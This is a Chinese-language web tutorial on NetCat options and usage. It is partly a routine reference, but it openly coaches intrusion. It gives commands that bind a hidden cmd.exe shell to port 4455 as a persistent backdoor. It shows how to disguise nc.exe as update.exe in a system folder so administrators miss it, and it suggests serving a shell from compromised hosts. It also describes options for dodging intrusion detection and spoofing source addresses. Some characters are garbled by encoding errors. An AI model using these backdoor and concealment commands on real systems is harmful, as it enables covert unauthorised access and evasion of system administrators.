關(guān)于NetCat的使用

　　nc的全稱為NetCat,它能夠建立并接受傳輸控制協(xié)議(TCP)和用戶數(shù)據(jù)報協(xié)議(UDP)的連接，Netcat可在這些連接上讀寫數(shù)據(jù)， 直到連接關(guān)閉為止。它可以通過手工或者腳本與應(yīng)用層的網(wǎng)絡(luò)應(yīng)用程序或服務(wù)進(jìn)行交互。從技術(shù)上來講，NetCat并不能產(chǎn)生UDP連接，因?yàn)閁DP是一種無 連接的協(xié)議。NetCat沒有圖形界面，很粗糙，很原始。

　　nc的命令行

　　nc的基本命令行形式是 nc [options] host ports,其中host是要掃描的主機(jī)名或IP地址，ports要么是一個單獨(dú)的端口，要么是一個端口范圍(用m-n的形式指定)，要么是一系列用空格隔開的單個端口。

　　-d 只對Windows操作系統(tǒng)有用，該選項(xiàng)使NetCat以隱蔽模式工作，從而脫離MS-DOS命令提示符下環(huán)境運(yùn)行，使得nc不需要保持打開命令窗口便可在監(jiān)聽模式下運(yùn)行，也可以幫助黑客很好地隱藏監(jiān)聽NetCat實(shí)例而不被系統(tǒng)管理員發(fā)現(xiàn)。

　　-e 如果NetCat使用gaping_security_hole選項(xiàng)進(jìn)行編譯，那么只要某人在NET后臺所監(jiān)聽的任何端口上建立連接，該NetCat都將 執(zhí)行,且客戶端的NetCat會通過管道將I/O傳輸?shù)皆趧e處監(jiān)聽的另一個NetCat實(shí)例中。使用這個選項(xiàng)非常危險，除非你對nc相當(dāng)了解，起碼知道你 自己在做什么。這是在系統(tǒng)中建立后門shell的一個非常快捷且容易的方法。

　　-i 延時間隔，表示在兩次數(shù)據(jù)發(fā)送之間nc等待的時間。例如：當(dāng)經(jīng)過管道傳輸一個文件到nc的時候，在傳輸輸入的下一行之前，nc將等待的秒數(shù)。當(dāng)使用nc對 一臺主機(jī)的多個端口之間進(jìn)行操作時，在切換到下一個端口之前，nc等待的秒數(shù)。這樣可以使黑客在進(jìn)行數(shù)據(jù)傳輸或?qū)σ粋�服務(wù)進(jìn)行攻擊的時候更加隱蔽，也可以 幫助你的端口掃描不被入侵檢測系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)。

　　-g這個選項(xiàng)具有欺騙性。nc支持loose source routing(松散源路由)。你可以在命令行中指定多達(dá)8個-g選項(xiàng)來強(qiáng)迫nc流量經(jīng)過特定的IP地址，這在你為流量設(shè)置偽造的源IP地址時，可以利用 這個方法達(dá)到通過防火墻的過濾器或者允許訪問主機(jī)列表，希望接收到從主機(jī)返回的響應(yīng)。

　　-G該選項(xiàng)讓用戶在-g選項(xiàng)所指定的路由列表中指定的一個地址作為當(dāng)前的下一路由，由于IP地址為4字節(jié)大小(IPV4)，所以這個參數(shù)總是4 字節(jié)的倍數(shù);例如，4代表路由表中的第一個IP地址，8代表第二個IP地址，依次類推。這在偽造部分源路由表使得報文看起來相當(dāng)?shù)挠杏�。在進(jìn)行欺騙和源路 由時，這個功能有助于屏蔽你的位置，但也不一定能接收到響應(yīng)報文，因?yàn)轫憫?yīng)報文將經(jīng)過由偽造的IP地址反路由回來。

　　-l 該選項(xiàng)切換nc的監(jiān)聽模式。此選項(xiàng)必須與-p選項(xiàng)一起使用以告訴nc綁定某個指定的TCP端口并等待到來的連接。若換成-u選項(xiàng)，則應(yīng)使用UDP端口而非TCP端口。

　　-L 該選項(xiàng)在Windows版本中有用，當(dāng)一個連接被關(guān)閉后，使用相同的命令行選項(xiàng)進(jìn)行重啟監(jiān)聽模式，即使此時初始的連接已經(jīng)結(jié)束，nc也能在不需要用戶干涉的情況下接收后面新的連接。與-l一樣，必須與-p同時使用。

　　-n 該選項(xiàng)告訴我們nc不做任何主機(jī)名查找的工作。

　　-0對數(shù)據(jù)執(zhí)行一次十六進(jìn)制轉(zhuǎn)儲(hex dump )并將其存儲在hexfile中。命令nc-o hexfile將把雙向通信的數(shù)據(jù)記錄下來，在每行的開始處會有一個“<"或">”用來分別指示是進(jìn)入數(shù)據(jù)還是外出數(shù)據(jù)。如果只想得到對進(jìn)入 數(shù)據(jù)的十六進(jìn)制轉(zhuǎn)儲，可以使用 nc -ohexfile命令。

　　-p 讓用戶指定一個nc應(yīng)使用的本地端口號。當(dāng)通過-l或-L選項(xiàng)來使用監(jiān)聽模式的時候，這個參數(shù)是必需的。如果沒有為外出連接指定這個參數(shù)，則與大多數(shù)其他TCP或UDP客戶程序的做法一樣，nc將使用系統(tǒng)分配給他的任何端口。

　　-r 該參數(shù)使nc可以隨機(jī)選擇本地和遠(yuǎn)程端口。當(dāng)使用nc在系統(tǒng)中范圍很大的一批端口上獲取信息時，要想混合源端口和目標(biāo)端口的順序看起來不怎么象端口掃描， 這個選項(xiàng)是很有用的。當(dāng)這個選項(xiàng)與-i選項(xiàng)和一個足夠大的間隔結(jié)合使用的時候，在不被注意的端口掃描成功幾率能得到很大提升。

　　-s 指定nc建立連接時所使用的IP地址，該選項(xiàng)允許黑客做一些工作，它允許黑客隱藏他們的IP地址或假冒他人的IP地址，但是要得到路由到他們所欺騙的地址 的任何信息，都需要使用-g源路由選項(xiàng)。其次，當(dāng)處于監(jiān)聽模式時，大多數(shù)情況下都可以與一個已經(jīng)監(jiān)聽的服務(wù)“預(yù)先綁定”，所有TCP和UDP服務(wù)都綁定到 某個端口。

　　-t 如果使用telnet選項(xiàng)編譯，nc就可以與telnet服務(wù)器進(jìn)行telnet選項(xiàng)協(xié)商，雖然它的響應(yīng)是毫無意義的信息，但可以通過該狀態(tài)看到連接23端口的信息。

　　-u nc使用UDP而非TCP，在客戶模式和監(jiān)聽模式下都起作用。

　　-v 控制nc將要做的事情達(dá)到的程度，如使用nc -v，那么nc將僅吐出它所接收到的數(shù)據(jù)，一個單獨(dú)的-v可以知道它連接或綁定的地址是否有問題發(fā)生，第2個-v可以讓nc在一個連接結(jié)束的時候讓你知道這個連接總共發(fā)送和接收了多少數(shù)據(jù)。

　　-w控制在一個連接上nc放棄之前等待的時間。同時也告訴nc當(dāng)在標(biāo)準(zhǔn)輸入上接收到一個eof(end-of-file)之后應(yīng)該等待多長時間 來關(guān)閉連接并退出。如果你通過nc向遠(yuǎn)程服務(wù)器發(fā)送命令并且期望大量的數(shù)據(jù)返回(例如：向一臺web服務(wù)器發(fā)送一個http命令以下載一個大文件)，該選 項(xiàng)是很有用的。

　　nc的具體使用

　　c:nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隱藏一個NetCat后門。

　　c:nc.exe -p 4455 -d -L -e cmd.exe 這個命令可以讓黑客利用NetCat重新返回系統(tǒng)，直到系統(tǒng)管理員在任務(wù)管理器中看見nc.exe在運(yùn)行，從而發(fā)現(xiàn)這個后門，我們一樣可以把它做的更加隱蔽，

　　c:move nc.exe c:windowssystem32Driversupdate.exe

　　c:windowssysteme32driversupdate.exe -p 4455 -d -L -e cmd.exe

　　系統(tǒng)管理員可能把特權(quán)附屬于一些無害的程序，如update.exe等，黑客也可以隱藏命令行。

　　c:windowssystme32driversupdate.exe

　　cmd line: -l -p 4455 -d -L -e cmd.exe

　　c:>

　　nc -l - p 80 監(jiān)聽80端口

　　nc -l -p 80 >c:log.dat 監(jiān)聽80端口，并把信息記錄到log.dat中

　　nc -v -l -p 80 監(jiān)聽80端口，并顯示端口信息

　　nc -vv -l -p 80 監(jiān)聽80端口，顯示更詳細(xì)的端口信息

　　nc -l -p 80 -t -e cmd.exe監(jiān)聽本地的80端口的入站信息，同時將cmd.exe重定向到80端口，當(dāng)有人連接的時候，就讓cmd.exe以telnet的形式應(yīng)答。當(dāng)然這個最好用在控制的肉雞上。

　　nc -v ip port 掃瞄某IP的某個端口

　　nc -v -z ip port-port掃描某IP的端口到某端口

　　nc -v -z -u ip port-port掃描某IP的某UDP端口到某UDP端口

【NetCat的使用】相關(guān)文章：

正確使用網(wǎng)絡(luò)作文11-10

電腦安全使用的原則09-19

多媒體使用的心得04-26

電腦ESC鍵使用技巧11-14

360隨身wifi使用教程11-11

ping命令的基本使用知識10-31

引號的正確使用-知識詳解11-27

怎么使用主板診斷卡11-27

引號的正確使用方法09-01

電腦的基本使用方法09-08